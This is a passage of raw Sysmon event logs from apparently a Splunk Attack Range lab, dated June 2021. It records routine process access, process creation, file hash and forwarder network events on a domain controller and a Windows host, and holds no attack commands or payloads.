21:46:04.034{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104880Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.034{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-711C-60CA-2E13-00000000CF01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104879Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.033{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-711C-60CA-2E13-00000000CF01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104878Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.033{54715871-711C-60CA-2E13-00000000CF01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104877Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.032{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EABF174AC14E041DF53D6AD0F55984B,SHA256=7A0B5C77F612CBC0915864D3071165F95D4EBB89FBD2C6E7A53AE20C5A29248D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151308Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.927{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D864F6BFA67C27058A724F8541D0BF,SHA256=D212B0B73D7D41AF2715312FDFBD5C9794456460E6B90D68E792DFB1670091EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151307Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.695{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-711C-60CA-1B0D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151306Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151305Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151304Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.692{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151303Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.692{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151302Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.692{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-711C-60CA-1B0D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151301Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.691{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-711C-60CA-1B0D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151300Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:04.691{39BD8DE3-711C-60CA-1B0D-00000000D101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104888Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.196{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55414-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000151339Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.747{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D891D752D718B7B45F7A54FABB001A62,SHA256=935AF0BD12FB75194DC05881690DF93AFA07C3AFF7C021A470EF98ADB2DE64D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151338Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.715{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775 10341000x8000000000000000151337Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.715{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 10341000x8000000000000000151336Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.715{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151335Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.715{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000151334Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.699{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-711D-60CA-1D0D-00000000D101}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151333Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151332Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151331Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.693{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-711D-60CA-1D0D-00000000D101}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151330Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151329Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.693{39BD8DE3-0F64-60CA-0C00-00000000D101}7201900C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151328Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.692{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-711D-60CA-1D0D-00000000D101}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151327Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:05.691{39BD8DE3-711D-60CA-1D0D-00000000D101}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 